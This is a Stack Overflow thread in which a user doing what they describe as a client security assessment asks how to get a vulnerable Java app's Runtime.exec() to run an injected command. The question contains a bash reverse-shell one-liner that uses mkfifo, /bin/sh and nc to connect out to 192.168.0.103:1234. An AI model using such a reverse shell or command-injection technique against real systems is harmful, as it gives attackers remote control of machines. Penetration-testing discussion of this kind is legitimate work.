convert java String to String[] using runtime.exec()

Question

I have a method like

public String doSomething(String paramString) {
    try {
       //do something with paramString and store it in myNewValue          
       return new String(myNewValue, "UTF8");
    } catch blocks...
}

Let's say doSomething() finally returns the below string:

{"bash","-c", "rm -f /tmp/backpipe; mkfifo /tmp/backpipe && /bin/sh 0</tmp/backpipe | nc 192.168.0.103 1234 1>/tmp/backpipe"}

Now it is actually an array of strings if you look at it, but since it was returned as a string from doSomething(), it is treated as a String alone and not String[].

Now let's say the above string is stored in str3 as :

String str3 = doSomething();

Now is there anyway that using:

Runtime.getRuntime().exec();

str3 can be converted to String[] and passed back to Runtime.getRuntime().exec();

So essentially something like:

Runtime.getRuntime().exec(some java magic here that converts str3 to String[] and then passes this String[] to this exec method itself);

Perhaps parse it as JSON and retrieve the results? I think using `exec()` is the wrong tool, unless you are asking how to convert that string into the **output** generated by running what appears to be a `bash` script. — Ted Hopp, Aug 26 '16 at 20:40
[`String#split`](https://docs.oracle.com/javase/8/docs/api/java/lang/String.html#split-java.lang.String-) — 4castle, Aug 26 '16 at 20:40
how can this be done with Runtime.getRuntime().exec() ? This is the most essential thing that I need to do. Convert it using the exec() and pass it back to the same exec() itself. — qre0ct, Aug 26 '16 at 20:43
Why do you need to use `exec()` for this? It seems like trying to use a hammer to inflate a tire. — Ted Hopp, Aug 26 '16 at 20:44
It looks like you should just refactor `doSomething` so that it returns a `String[]` — 4castle, Aug 26 '16 at 20:44
Yes. I would agree to it. If I had full control over changing all the code, I would have gone one of the ways you guys have suggested so far. However, this is about a specific case where I can not (not allowed to as per the rules of the game) change the code. I can only play around with the input (i.e. str3) which finally lands up in the exec() and whatever is in str3 (which as you rightly pointed out is a bash shell with some more commands) needs to be executed. Now the exec() itself needs a String[] to function properly and hence all this chaos. — qre0ct, Aug 26 '16 at 20:49
That still doesn't answer the question of why you need to use `exec()` to convert from a string to a string array. It seems that would be a pre-processing step before calling `exec()`. — Ted Hopp, Aug 26 '16 at 20:52
So you really want to do something like: `Runtime.getRuntime().exec( [ "/usr/local/bin/convertMyStringToArrayAndExecIt.sh", str3 ], ... )` and write a script in shell do turn str3 into a real command line. But there's a bunch of assumptions in there about what your runtime actually lives on top of. (i.e. Your tags are all wrong :) — Tibrogargan, Aug 26 '16 at 20:54
@TedHopp Yes. You're right. There is no need to use exec() to do the above. But, I can not change the way the code is functioning. Let me explain it here : So basically it is a security assessment that I am doing of a certain java application. The application seems to have security loop holes which I am writing an exploit for to demo it to my clients. Now the way I can trigger the vulnerability with the application is by passing only user input (str3) to it which lands in exec() & thus gives me a chance of exploit. Now here, it would not make sense to change the application code itself. Right — qre0ct, Aug 26 '16 at 20:56
Which part of your example `doSomething` return value is the user input and what is currently being passed to `exec()`? — Tibrogargan, Aug 26 '16 at 20:59
Also, there is a version of `exec()` takes a single `String` command argument instead of a `String[]` command array. Perhaps you can use that. — Ted Hopp, Aug 26 '16 at 21:00
the user input really is the parameter to the doSomething() which gets manipulated inside the method and finally gets returned back as a String. Now this returned String is what is passed to the exec(). — qre0ct, Aug 26 '16 at 21:01
@TedHopp again, I can NOT change the code of the app. If I could, I would not bother with the exec() at all. The whole point is that because the app is using this exec() I can execute some arbitrary commands on the user's machine through this. That's how the app is coded. It is vulnerable and is not handling user input properly. — qre0ct, Aug 26 '16 at 21:02
@geek_ji I was assuming doSomething is manipulating the user input. That's why I asked specifically what part of the return value is the user input. — Tibrogargan, Aug 26 '16 at 21:04
You need to clarify what (if any) part of this is under your control to change. It sounds from the question that you can at least insert a second call to `exec()`, but your comments suggest otherwise. Either the program passes `str3` directly to `exec()`, or else it doesn't and you have a chance to change the call to `exec()`. Which is it? — Ted Hopp, Aug 26 '16 at 21:04
user input is paramString. After all the processing that's done on paramString inside doSomething(), the method returns a String which is stored in str3. Now, because paramString was specially crafted, str3 turns out to be the string : {"bash","-c", "rm -f /tmp/backpipe; mkfifo /tmp/backpipe && /bin/sh 0/tmp/backpipe"} Now as per the further flow of the code, exec(str3) is called. Now, because str3 is a String and exec() expects a String[] to function properly, str3 does not get executed by the exec() and instead just throws errors. — qre0ct, Aug 26 '16 at 21:11
how does that matter? Anyway, it is a cipher text. doSomething() basically just decrypts the cipher and produces plain text bash command : {"bash","-c", "rm -f /tmp/backpipe; mkfifo /tmp/backpipe && /bin/sh 0/tmp/backpipe"} — qre0ct, Aug 26 '16 at 21:13
It matters a lot. You want to decrypt it into something that can be inserted into that command so it runs correctly. See my answer — Tibrogargan, Aug 26 '16 at 21:15
So this sounds like an [X-Y problem](http://meta.stackexchange.com/questions/66377/what-is-the-xy-problem). From what you describe, you *cannot* modify `str3` before it is passed to `exec()`. Instead, you want to provide some sort of input that generates an `str3` that can be executed without error by `exec()` and the only thing you control is the (simulated) user input to `doSomething()` (and hence, indirectly, the value of `str3`). Is that about right? — Ted Hopp, Aug 26 '16 at 21:20
somewhat. So you CAN modify the VALUE of str3 but not it's type. The rest of it is perfectly well understood. Please pardon the caps, wanted to use italics like you did, but don't know how to do that. — qre0ct, Aug 26 '16 at 21:24
Ah. So perhaps you want to convert the string `{"bash","-c","rm ..."}` to the string `bash -c rm ...`. Then you can pass that string to `exec()`. Would that do the job for you? — Ted Hopp, Aug 26 '16 at 21:29
yes. Ideally that should work. But it doesn't. If I just pass bash -c rm ... as you suggested, it throws an error saying : Cannot run program "{"bash","-c",": error=2, No such file or directory Check this question I posted about it http://stackoverflow.com/questions/39172885/java-runtime-getruntime-exec-unable-to-run-commands/39172939?noredirect=1#comment65689213_39172939 — qre0ct, Aug 26 '16 at 21:33
The user inputs a string that is decrypted, then manipulated in some undisclosed fashion and inserted somewhere into the return value of the `doSomething` method. You want to know how the user's input string can be modified in some way so that when the return value of `doSomething` is passed to Runtime.exec() it will execute an unintended command. — Tibrogargan, Aug 26 '16 at 21:34
The most important part here, that you seem to be completely discounting, is how `doSomething` manipulates the user input. Without knowing what it's doing to String X to produce String Y it's impossible to determine how X should be modified to produce the result you want. Unless you're saying you already have `doSomething` outputting the string you give as an example? — Tibrogargan, Aug 26 '16 at 22:03

score -3 · Answer 1 · answered Aug 26 '16 at 20:44

-3

You can split the string about , assuming that any string in the array does not contain ,

String[] string3 = doSomething(foo).split(",");

answered Aug 26 '16 at 20:44

Anon Ymous

88
1
6

2

And what about the braces around the whole thing? And the quote marks around each string? And commas that might appear inside a string? And handling any escaped quote marks inside the actual quote mark delimiters? – Ted Hopp Aug 26 '16 at 20:46

convert java String to String[] using runtime.exec()

1 Answers1